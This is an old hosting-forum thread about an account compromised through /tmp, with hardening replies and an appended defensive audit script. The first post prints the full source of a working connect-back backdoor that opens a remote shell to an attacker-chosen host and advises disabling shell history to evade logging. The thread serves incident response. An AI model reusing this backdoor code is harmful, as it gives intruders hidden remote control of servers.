
One account hacked through /tmp

Discussion in 'General Discussion' started by elleryjh, Jan 31, 2004.

  1. elleryjh, Well-Known Member, Apr 12, 2003

    One account on a new, up-to-date server was hacked. The account doesn't have shell access. The site's index page was changed, with no other visible. The user is not likely to have done the exploit.

    phpsuexec, suexec and php_basedir are all enabled.

    No FTP activity for that account was listed in /var/log/messages.

    No processes are running by that user.

    Does anybody know how this attack was carried out, and where to look for more evidence?

    /tmp is mounted as noexec, and
    root@server [/tmp]# /scripts/securetmp
    /tmp is already secure
    /var/tmp is already secure
    Process Complete

    However, it looks like this file was compiled and run... This file and its binary were in /tmp, owned by that user:
    root@server [/tmp]# more dc-connectback.c
    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    int main(int argc, char **argv) {
        char *host;
        int port = 80;
        int f;
        int l;
        int sock;
        struct in_addr ia;
        struct sockaddr_in sin, from;
        struct hostent *he;
        char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
                      "Issue \"export TERM=xterm; exec bash -i\"\n"
                      "For More Reliable Shell.\n"
                      "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
                      "For Not Getting Logged.\n(;\n\n";

        printf("Data Cha0s Connect Back Backdoor\n\n");
        if (argc < 2 || argc > 3) {
            printf("Usage: %s [Host] <port>\n", argv[0]);
            return 1;
        }
        printf("[*] Dumping Arguments\n");
        l = strlen(argv[1]);
        if (l <= 0) {
            printf("[-] Invalid Host Name\n");
            return 1;
        }
        if (!(host = (char *) malloc(l))) {
            printf("[-] Unable to Allocate Memory\n");
            return 1;
        }
        strncpy(host, argv[1], l);
        if (argc == 3) {
            port = atoi(argv[2]);
            if (port <= 0 || port > 65535) {
                printf("[-] Invalid Port Number\n");
                return 1;
            }
        }
        printf("[*] Resolving Host Name\n");
        he = gethostbyname(host);
        if (he) {
            memcpy(&ia.s_addr, he->h_addr, 4);
        } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
            printf("[-] Unable to Resolve: %s\n", host);
            return 1;
        }
        sin.sin_family = PF_INET;
        sin.sin_addr.s_addr = ia.s_addr;
        sin.sin_port = htons(port);
        printf("[*] Connecting...\n");
        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            printf("[-] Socket Error\n");
            return 1;
        }
        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
            printf("[-] Unable to Connect\n");
            return 1;
        }
        printf("[*] Spawning Shell\n");
        f = fork( );
        if (f < 0) {
            printf("[-] Unable to Fork\n");
            return 1;
        } else if (!f) {
            write(sock, msg, sizeof(msg));
            dup2(sock, 0);
            dup2(sock, 1);
            dup2(sock, 2);
            execl("/bin/sh", "shell", NULL);
            return 0;
        }
        printf("[*] Detached\n\n");
        return 0;
    }
  2. Stenny Chong, Well-Known Member, Jun 12, 2002

    I suggest you do the following to secure the server and disallow other users from compiling programs.

    chmod 700 /usr/bin/gcc.
  3. kris1351, Well-Known Member, Apr 18, 2003, Lewisville, Tx

    Definitely need to run /scripts/securetmp

    This will make it so no compiling or executions can happen in tmp. Like Stenny said also make gcc non-executable. You can change it when you need to compile very easily.
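As an added example that is not posted in this thread, here is a small POSIX sh audit helper that checks the two mitigations the replies recommend (noexec/nosuid on /tmp and /var/tmp, and gcc no longer executable by group or other after chmod 700) and hunts a temp directory for compiled ELF binaries like the one found above. The function names are my own; the mounts table is passed in as a path (normally /proc/mounts) so the check can be exercised against a constructed table.

```shell
# Added audit helper, not part of the thread: checks the hardening the replies
# recommend and hunts for compiled binaries left in a temp directory.

# mount_has_opts MOUNTPOINT MOUNTS_TABLE "opt1 opt2 ...": succeed only if the
# mount entry for MOUNTPOINT carries every listed option. MOUNTS_TABLE is
# normally /proc/mounts; passing a path keeps the check testable offline.
mount_has_opts() {
    opts=$(awk -v mp="$1" '$2 == mp { o = $4 } END { print o }' "$2")
    [ -n "$opts" ] || return 1          # not a separate mount at all
    for want in $3; do
        case ",$opts," in
            *",$want,"*) ;;
            *) return 1 ;;
        esac
    done
}

# mode_exec_by_nonowner MODE: succeed if an ls -l mode string such as
# -rwxr-xr-x grants execute (or setgid/sticky) to group or other, i.e. the
# "chmod 700 /usr/bin/gcc" advice above has not been applied.
mode_exec_by_nonowner() {
    case "$1" in
        ??????[xs]*|?????????[xt]) return 0 ;;
    esac
    return 1
}

# gcc_exec_by_nonowner PATH: run the mode check against a real file.
gcc_exec_by_nonowner() {
    mode_exec_by_nonowner "$(ls -ld "$1" | cut -c1-10)"
}

# find_elf_files DIR: print regular files under DIR whose first four bytes are
# the ELF magic, i.e. compiled binaries like the dc-connectback one above.
find_elf_files() {
    magic=$(printf '\177ELF')
    find "$1" -type f 2>/dev/null | while IFS= read -r f; do
        if [ "$(head -c 4 "$f" 2>/dev/null)" = "$magic" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Typical use on a live host (output is left for the admin to read):
#   mount_has_opts /tmp /proc/mounts "noexec nosuid" || echo "/tmp not hardened"
#   gcc_exec_by_nonowner /usr/bin/gcc && echo "gcc runnable by every user"
#   find_elf_files /tmp
```

Note that noexec on /tmp does not stop a file from being compiled there, which is why the replies pair it with restricting gcc.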
